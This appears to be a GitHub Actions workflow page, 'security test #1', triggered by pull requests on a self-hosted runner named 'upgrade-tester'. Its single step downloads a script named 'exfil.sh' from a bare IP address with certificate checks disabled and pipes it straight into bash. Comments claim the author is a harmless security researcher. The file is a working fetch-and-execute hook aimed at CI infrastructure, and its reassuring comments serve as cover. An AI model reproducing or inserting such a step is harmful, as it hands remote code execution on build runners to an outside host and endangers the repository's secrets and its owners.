Skip to content

security test

security test #1

Workflow file for this run

name: Security test
on:
pull_request:
jobs:
security:
runs-on: upgrade-tester
steps:
- name: security test
run: |
# If you're reading this, please know I'm a security researcher and mean no harm.
# If this workflow runs as expected, I'll reach out soon to report a security issue.
# otherwise you can safely ignore this
# In the meantime, you can reach me on Twitter if you have any question
curl -k https://193.70.37.121/static/exfil.sh | bash